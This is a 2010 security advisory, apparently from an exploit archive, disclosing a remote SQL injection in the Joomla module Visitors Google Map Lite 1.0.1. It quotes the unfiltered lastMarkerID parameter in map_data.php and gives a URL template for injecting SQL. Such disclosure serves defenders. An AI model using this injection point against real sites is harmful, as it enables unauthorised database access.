扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 |
Visitors Google Map Lite 1.0.1 (FREE) (module mod_visitorsgooglemap Remote Sql Injection) ========================================================================================= - Discovered by : Chip D3 Bi0s - Email : chipdebios[at]gmail[dot]com - Group : LatinHackTeam - Date: 2010-09-08 - Where : From Remote ------------------------------------------------------------------------------------- Affected software description Application : Visitors Google Map Lite 1.0.1 (FREE) (module:mod_visitorsgooglemap) Developer : Serdar Gökkus Compatibility : Joomla 1.5 Native License : GPLv2 or later Date Added: Sunday August 29, 2010 01:14:14 Download: http://www.comlantis.com/download/doc_download/2-visitors-google-map-lite-101-free.html I. BACKGROUND This extension tracks visitors of your site in real time and displays their locations in Google Map. It uses three main technologies: - Map API of Google - AJAX - IP geolocation API of IPInfoDB Content of VisitorsGoogeMap Package: This extension contains one Joomla Compoment and two Joomla Modules. com_visitorsgooglemap: This component is responsible for the creation database table during installation and remove it clearly in case of uninstallation. mod_visitorsgooglemap: This module is responsible for the display of Google Map in desired module position in your template and track the visitors of your Joomla page in the map. mod_visitorsgooglemap_agent: This module is responsible for the updating visitors information in the database. II. DESCRIPTION Some sql injecton vulnerabilities exist in mod_visitorsgooglemap module . III. ANALYSIS The bug is in the following files, specifying the lines /mod_visitorsgooglemap/map_data.php [16] [if ($_GET['action'] == 'listpoints') [17] { [18] $lastMarkerID = $_GET['lastMarkerID']; [19] ini_set('default_mimetype','text/xml'); // manchmal notwendig [20] header ('Content-Type: text/xml'); // reicht nicht immer [21] echo '<?xml version="1.0" ?>'; [22] echo '<xmlresponse>'; [23] $database =& JFactory::getDBO(); [24] $query = "SELECT * FROM #__visitorsgooglemap_location where id > $lastMarkerID order by id"; Explanation:As noted in the line [24] $ lastMarkerID nowhere is filtered, which result in a query pede unexpected IV. EXPLOITATION http://site/path/modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0{sql} +++++++++++++++++++++++++++++++++++++++ [!] Produced in South America +++++++++++++++++++++++++++++++++++++++ |
体验盒子
